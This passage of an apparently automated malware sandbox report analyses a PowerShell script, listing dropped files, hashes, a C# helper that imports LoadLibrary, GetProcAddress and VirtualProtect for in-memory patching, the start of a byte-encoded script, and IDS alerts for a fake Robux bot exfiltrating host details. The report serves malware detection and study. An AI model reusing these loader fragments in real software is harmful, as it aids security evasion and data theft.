                                                                      Preview:L......g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP........................p....aF..........4.......C:\Users\user\AppData\Local\Temp\RES6B3F.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.0.w.3.v.5.e.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kv1qpmj.zva.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xaxjyc3.2ef.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5vcsp41.ykc.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axcp5qnu.5a0.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fln0bzrh.s5t.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihyv3gh5.hif.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ite01mkb.p25.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rl1wkg4y.1du.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlt4b3of.2gu.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucjd1kjb.tyk.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      File Type:Unknown
                                                                      Category:dropped
                                                                      Size (bytes):652
                                                                      Entropy (8bit):3.1170348176421916
                                                                      Encrypted:false
                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKlFiak7Ynqq5lFjPN5Dlq5J:+RI+ycuZhNgl8akS5lRPNnqX
                                                                      MD5:AA909B879110B8DAE770B2E0E2F66146
                                                                      SHA1:FEF8920E90F9014952EF084BB9E7E215A7380B93
                                                                      SHA-256:F1B0F4D4BADFD8FD9A77A04624BEBEA836C6342ACEF9A0A29801C41B966A76A7
                                                                      SHA-512:155029773D31E36CBAFE4D44570986FDF5141E4AFF8B808E3C44C30BFB8C0EFD49A461691968F6D26FA0CD88EF9FAC1E18D8E08BEBD01C39462AA2D99B19A358
                                                                      Malicious:false
                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.0.w.3.v.5.e.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.0.w.3.v.5.e.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                      C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.0.cs

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text
                                                                      Category:dropped
                                                                      Size (bytes):1140
                                                                      Entropy (8bit):4.751587839856729
                                                                      Encrypted:false
                                                                      SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                      MD5:FE35992F552A2057291C867108A5C2EB
                                                                      SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                      SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                      SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                      Malicious:false
                                                                      Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                      C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):369
                                                                      Entropy (8bit):5.2582476678358265
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fTeI0zxs7+AEszIwkn23fTeO:p37Lvkmb6KRfCWZEifH
                                                                      MD5:E7DE9CF57BD0C8B3F884210C717739F8
                                                                      SHA1:5597C9F841DE70758208A967C463F5365CC23FA1
                                                                      SHA-256:656EC4BCBC6AC5BC891A0D922C27EEC1D45868C3933A64CF4F48B79E94914E1D
                                                                      SHA-512:2021DBFB90B0C9F23721C6795D029F5E278D7B332714D87F892EB1980458B7422DFCFD8AEAA8016F6D80A52429311A4585B42122F13166376989C12B944676BE
                                                                      Malicious:true
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.0.cs"

                                                                      C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.dll

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      File Type:Unknown
                                                                      Category:dropped
                                                                      Size (bytes):4096
                                                                      Entropy (8bit):2.988529265735905
                                                                      Encrypted:false
                                                                      SSDEEP:48:6IpLNvhfeRPBFLbKhSJbCXumwvvV1ulg8a37jq:3JhfeR5dpTGBK
                                                                      MD5:D43FCF66805D1670CE64D95176E21F9C
                                                                      SHA1:34148DE648EBF714B3DD22FC07962D774C107DC1
                                                                      SHA-256:4B0F22DFFC118C9776C517336DF034F39BCD6E4D7EB56F89188BC27D2438DF5F
                                                                      SHA-512:046D646F842A1A0C8F59DFBEF1DAAC8E566F4A6EAF505E372702B038993A9B525EFFCD3CCFA047CACDBA3551C7B3743C2CE36DDED5BF21FCE3DC202FA47F21EE
                                                                      Malicious:false
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                      C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.out

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):869
                                                                      Entropy (8bit):5.33148664159412
                                                                      Encrypted:false
                                                                      SSDEEP:24:KJBId3ka6KRfzEifOKax5DqBVKVrdFAMBJTH:Ckka6CzEuOK2DcVKdBJj
                                                                      MD5:6ECB37FB2AB32DAFF65637B790B2AAC0
                                                                      SHA1:915735B15AC3DD3F072D6D905CE2072D8C041CCB
                                                                      SHA-256:27B96FFEDD9BDDC58536567D182B90B8FD9A05E367EE27CC90AAC280640B3717
                                                                      SHA-512:D20843D65C513A9CF9DA9648B592E996764482D3DA6F15176C2259DA7AF3CDE1A7CD93480726850B1A219BB8CEFE793931600C302F2EC1FF531F19CEB877F948
                                                                      Malicious:false
                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EIXYLUL0HH7Y9W8WAND.temp

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7239274794191615
                                                                      Encrypted:false
                                                                      SSDEEP:48:hodQw9QLPr3C4U28hjPukvhkvklCywamdytqEklokSogZoxStqEklokSogZoF1:idxQ33CxHhSkvhkvCCtgYEkqHnYEkqHW
                                                                      MD5:449F7DB066D37540B7C71669998B32CC
                                                                      SHA1:9D783A86869D4D8336044BA780B60F61E64E10EE
                                                                      SHA-256:05ECBE27EE030A3010474513BDBBD0DDCC060BD8D5F67AC710AF3F974056D8F9
                                                                      SHA-512:F4A2CB856A016F1BB30CEE6882BBAA71AC87E9765E2980CF7A852C425B383DFFFD07C4CA56410057C1C5222088353D574043C548D90C87D765449EAB902F0617
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v.......}....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....w..y.......}........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^OY.............................%..A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......CW.^OY................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`...........................z..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^OY......Q...........

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7239274794191615
                                                                      Encrypted:false
                                                                      SSDEEP:48:hodQw9QLPr3C4U28hjPukvhkvklCywamdytqEklokSogZoxStqEklokSogZoF1:idxQ33CxHhSkvhkvCCtgYEkqHnYEkqHW
                                                                      MD5:449F7DB066D37540B7C71669998B32CC
                                                                      SHA1:9D783A86869D4D8336044BA780B60F61E64E10EE
                                                                      SHA-256:05ECBE27EE030A3010474513BDBBD0DDCC060BD8D5F67AC710AF3F974056D8F9
                                                                      SHA-512:F4A2CB856A016F1BB30CEE6882BBAA71AC87E9765E2980CF7A852C425B383DFFFD07C4CA56410057C1C5222088353D574043C548D90C87D765449EAB902F0617
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v.......}....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....w..y.......}........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^OY.............................%..A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......CW.^OY................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`...........................z..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^OY......Q...........

                                                                      Static File Info

                                                                      General

                                                                      File type:ASCII text, with very long lines (17986)
                                                                      Entropy (8bit):3.6525521543647708
                                                                      TrID:
                                                                        File name:cr_asm2.ps1
                                                                        File size:25'761 bytes
                                                                        MD5:782ab7dfe2568c218f929be60535752f
                                                                        SHA1:3252fb10a4ba993ecb134278fce66bc7ef70ce3f
                                                                        SHA256:ddeb810f3a979f027050968ef30cab877299e6586bdfe05b57dd0d311e7e2c02
                                                                        SHA512:77e75bd34f155fd68795eeb0e8438d6ee6e9a2aac17f34362e8cad6635a4556d660450db0a349355b79e8c659d49ee71db2565a324fe9b655a5c5f44df74955d
                                                                        SSDEEP:192:bDy2fNXj5GA+uHgMsMlwpFshbwqUdMFit2H:bDy2fNXj5GA+ul1b3Ua9H
                                                                        TLSH:62C255F5B318649FBAC7AF9CC3455152D26DD13123E0594BFBAD881AEACAC535030B2E
                                                                        File Content Preview:$bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79

                                                                        File Icon

                                                                        Icon Hash:3270d6baae77db44

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-10-15T18:09:20.291533+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.449737162.159.137.232443TCP
                                                                        2024-10-15T18:09:35.425890+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.449761162.159.137.232443TCP
                                                                        2024-10-15T18:09:42.107904+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.449797162.159.137.232443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 15, 2024 18:09:19.207916975 CEST4973680192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.212757111 CEST8049736172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:19.212856054 CEST4973680192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.215377092 CEST4973680192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.220263958 CEST8049736172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:19.353152990 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:19.353189945 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:19.353265047 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:19.364695072 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:19.364722967 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:19.821805000 CEST8049736172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:19.830171108 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.830274105 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:19.830389023 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.834661961 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.834697962 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:19.875639915 CEST4973680192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:19.977612972 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:19.977679968 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:19.982860088 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:19.982872963 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:19.983285904 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:19.990149975 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:20.031399965 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:20.114209890 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:20.115159035 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:20.115181923 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:20.291542053 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:20.291616917 CEST44349737162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:20.292085886 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:20.302119970 CEST49737443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:20.451425076 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:20.451560974 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:20.453480959 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:20.453511953 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:20.453773975 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:20.459861040 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:20.503402948 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:20.608402014 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:20.608517885 CEST44349738172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:20.608565092 CEST49738443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:20.627918005 CEST49738443192.168.2.4172.67.19.24
